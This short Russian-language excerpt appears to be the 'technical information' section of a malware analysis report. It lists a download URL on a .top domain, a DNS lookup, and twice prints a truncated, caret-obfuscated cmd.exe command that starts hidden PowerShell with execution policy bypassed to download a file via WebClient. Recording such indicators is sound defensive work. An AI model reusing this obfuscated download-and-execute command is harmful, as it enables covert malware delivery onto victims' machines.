Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwE^Rs^h^eLL^.e^x^E^ -Ex^E^C^U^TIO^n^PolicY^ byP^aSs ^-Nop^rO^F^I^Le -Wi^NDO^WsTy^l^E ^HIdDe^n^ (^neW-obJ^eC^T sYS^T^EM.NEt^.web^clI^eNT^).^DO^W^n^LoA^Df^iLe^(^'http://www.fapoerg...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "p^OwE^Rs^h^eLL^.e^x^E^ -Ex^E^C^U^TIO^n^PolicY^ byP^aSs ^-Nop^rO^F^I^Le -Wi^NDO^WsTy^l^E ^HIdDe^n^ (^neW-obJ^eC^T sYS^T^EM.NEt^.web^clI^eNT^).^DO^W^n^LoA^Df^iLe^(^'http://www.fapoerg...' (со скрытым окном)